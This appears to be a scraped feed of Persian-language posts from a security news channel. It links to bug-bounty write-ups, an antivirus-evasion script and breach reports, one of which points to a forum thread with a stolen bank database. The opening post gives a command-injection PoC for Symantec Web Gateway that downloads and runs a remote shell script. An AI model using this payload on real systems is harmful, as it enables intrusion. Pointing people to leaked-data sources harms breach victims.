آسیب پذیری اجرای دستور از راه دور در سرویس Symantec Web Gateway نسخه ی 5.0.2.8
[PoC]
POST /spywall/timeConfig.php HTTP/1.1
posttime=1585228657&saveForm=Save×ync=1&ntpserver=https://qweqwe.com;$(wget%20https://192.168.1.
170/a.sh%20-O%20/tmp/a.sh;sh%20/tmp/a.sh);#&timezone=5
https://packetstormsecurity.com/files/157163/Symantec-Web-Gateway-5.0.2.8-Remote-Code-Execution.html
#symantec
#exploit
#rce
@sec_nerd
[PoC]
POST /spywall/timeConfig.php HTTP/1.1
posttime=1585228657&saveForm=Save×ync=1&ntpserver=https://qweqwe.com;$(wget%20https://192.168.1.
170/a.sh%20-O%20/tmp/a.sh;sh%20/tmp/a.sh);#&timezone=5
https://packetstormsecurity.com/files/157163/Symantec-Web-Gateway-5.0.2.8-Remote-Code-Execution.html
#symantec
#exploit
#rce
@sec_nerd
Forwarded from Information Security
xencrypt
اسکریپت پاورشل برای دور زدن آنتی ویروس ها
https://hakin9.org/xencrypt-a-powershell-script-anti-virus-evasion-tool/
#windows
#ps
#bypass
@sec_nerd
اسکریپت پاورشل برای دور زدن آنتی ویروس ها
https://hakin9.org/xencrypt-a-powershell-script-anti-virus-evasion-tool/
#windows
#ps
#bypass
@sec_nerd
بانک ملی افغانستان هم هک شد
دیتابیس این بانک که حجم بسیار اندکی دارد بصورت رایگان در raidforums قرار گرفت
https://raidforums.com/Thread-Bank-Meli-Afghan-Full-Database-bma-com-af
#breach
#afghanistan
@sec_nerd
دیتابیس این بانک که حجم بسیار اندکی دارد بصورت رایگان در raidforums قرار گرفت
https://raidforums.com/Thread-Bank-Meli-Afghan-Full-Database-bma-com-af
#breach
#afghanistan
@sec_nerd
امنیت اطلاعات
استفاده از سرویس کنفرانس zoom روز به روز در حال افزایش است به طوری که شرک کنندگان روزانه ی کنفرانس ها در این سرویس از ۲۰۰ میلیون هم گذشته است. با افزایش شهرت زوم هکرها نیز به سراغ این سرویس رفته اند و موفق به هک کردن حساب بیش از ۳۵۰ اکانت وریفای شده ی زوم…
رایت آپی در خصوص نحوه ی نفوذ به حسابهای zoom
https://medium.com/@s3c/how-i-hacked-worldwide-zoom-users-eafdff94077d
#zoom
#writeup
@sec_nerd
https://medium.com/@s3c/how-i-hacked-worldwide-zoom-users-eafdff94077d
#zoom
#writeup
@sec_nerd
مجموعه رایت آپهای مرتبط با آسیب پذیری SSRF
medium.com/a-bugz-life/exploiting-an-ssrf-trials-and-tribulations-14c5d8dbd69a
https://medium.com/@michan001/ssrf-on-pdf-generator-36b81e16d67b
https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/
https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437
https://medium.com/@pflash0x0punk/ssrf-via-ffmpeg-hls-processing-a04e0288a8c5
https://kntx.xyz/Blind-SSRF-due-to-Sentry-Misconfiguration/
https://jin0ne.blogspot.com/2019/11/bugbounty-simple-ssrf.html
https://openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
https://evanricafort.blogspot.com/2019/08/ssrf-vulnerability-in.html
https://medium.com/@androgaming1912/gain-adfly-smtp-access-with-ssrf-via-gopher-protocol-26a26d0ec2cb
#ssrf
#writeup
#bugbounty
#web
#pentest
@sec_nerd
medium.com/a-bugz-life/exploiting-an-ssrf-trials-and-tribulations-14c5d8dbd69a
https://medium.com/@michan001/ssrf-on-pdf-generator-36b81e16d67b
https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/
https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437
https://medium.com/@pflash0x0punk/ssrf-via-ffmpeg-hls-processing-a04e0288a8c5
https://kntx.xyz/Blind-SSRF-due-to-Sentry-Misconfiguration/
https://jin0ne.blogspot.com/2019/11/bugbounty-simple-ssrf.html
https://openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
https://evanricafort.blogspot.com/2019/08/ssrf-vulnerability-in.html
https://medium.com/@androgaming1912/gain-adfly-smtp-access-with-ssrf-via-gopher-protocol-26a26d0ec2cb
#ssrf
#writeup
#bugbounty
#web
#pentest
@sec_nerd
Medium
Exploiting an SSRF: Trials and Tribulations
I mostly wanted to share this post not because it’s a novel and unique attack, but to show the thought process of attacking this…
تلفیق سه آسیب پذیری برای بدست آوردن RCE در Microsoft AttackSurfaceAnalyzer
https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/
#windows
#privesc
@sec_nerd
https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/
#windows
#privesc
@sec_nerd
تکنیک های معمول در حملات XXE و SSRF
تست کیس های این دو حمله:
https://blog.aisecureme.com/application-security-test-cases-for-xxe-ssrf/
#xxe
#ssrf
@sec_nerd
تست کیس های این دو حمله:
https://blog.aisecureme.com/application-security-test-cases-for-xxe-ssrf/
#xxe
#ssrf
@sec_nerd
دیتابیس اپلیکیشن MCA Wizard که یک سرویس پرکاربر وام های کوتاه مدت و مدیریت اعتبارات شرکتهای کوچک است به سرقت رفت.
این دیتابیس حدود ۵۰۰ هزار رکورد دارد که اطلاعات مالی، مالیات، کپی های اسناد بانکی، گواهینامه ی رانندگی،کدملی و جزییات دیگری را در خود دارد که برای سارقان اینترنتی بسیار کاربردی است.
این دیتابیس بر روی یک باکت محافظت نشده ی آمازون قرار داشت.
https://securityboulevard.com/2020/04/breacher-feature-mca-wizard/
#breach
#news
@sec_nerd
این دیتابیس حدود ۵۰۰ هزار رکورد دارد که اطلاعات مالی، مالیات، کپی های اسناد بانکی، گواهینامه ی رانندگی،کدملی و جزییات دیگری را در خود دارد که برای سارقان اینترنتی بسیار کاربردی است.
این دیتابیس بر روی یک باکت محافظت نشده ی آمازون قرار داشت.
https://securityboulevard.com/2020/04/breacher-feature-mca-wizard/
#breach
#news
@sec_nerd
ابزار کشف آسیب پذیری هایی از نوع DOM Based XSS
https://github.com/dwisiswant0/findom-xss
#xss
#pentest
@sec_nerd
https://github.com/dwisiswant0/findom-xss
#xss
#pentest
@sec_nerd
👍1
یک هکر ناشناس دسترسی به شبکه ی بانکی یک بانک اوکراینی را با مبلغ 1.5 بیت کوین به فروش گذاشته است
این دسترسی شامل اکتیودایرکتوری، سیستم سوئیفت و دیتابیس اوراکل می باشد.
https://twitter.com/Bank_Security/status/1249266517285441537
#breach
#ukrain
@sec_nerd
این دسترسی شامل اکتیودایرکتوری، سیستم سوئیفت و دیتابیس اوراکل می باشد.
https://twitter.com/Bank_Security/status/1249266517285441537
#breach
#ukrain
@sec_nerd
یک سناریوی جالب از کشف آسیب پذیری RCE بر روی ساب دامین یک شرکت
#bugbounty
#rce
#pentest
#shodan
@sec_nerd
#bugbounty
#rce
#pentest
#shodan
@sec_nerd
نفوذ به پنل ادمین یک بات تلگرامی و رسیدن به شل
https://translate.google.com/translate?sl=auto&tl=en&u=https%3A%2F%2Fkrober.biz%2F%3Fp%3D3498
#writeup
#web
#telegram
@sec_nerd
https://translate.google.com/translate?sl=auto&tl=en&u=https%3A%2F%2Fkrober.biz%2F%3Fp%3D3498
#writeup
#web
#telegram
@sec_nerd
مشخصات بیش از یک میلیون و چهارصد هزار پزشک امریکایی در raidforums به فروش گذاشته شد
این اطلاعات حاوی نام، آدرس،ایمیل،شماره تلفن و حساب لینکدین است.
به نظر میرسد دیتای مذکور از api وبسایت findadoctor.com بدست آمده باشد.
#breach
#usa
@sec_nerd
این اطلاعات حاوی نام، آدرس،ایمیل،شماره تلفن و حساب لینکدین است.
به نظر میرسد دیتای مذکور از api وبسایت findadoctor.com بدست آمده باشد.
#breach
#usa
@sec_nerd
امنیت اطلاعات
ابزار اسکن Google Maps API https://github.com/ozguralp/gmapsapiscanner #pentest #api @sec_nerd
یک رایت آپ ساده با موضوع RCE
قابل فهم برای افراد تازه کار
https://medium.com/bugbountywriteup/simple-remote-code-execution-vulnerability-examples-for-beginners-985867878311
#writeup
#rce
#bugbounty
@sec_nerd
قابل فهم برای افراد تازه کار
https://medium.com/bugbountywriteup/simple-remote-code-execution-vulnerability-examples-for-beginners-985867878311
#writeup
#rce
#bugbounty
@sec_nerd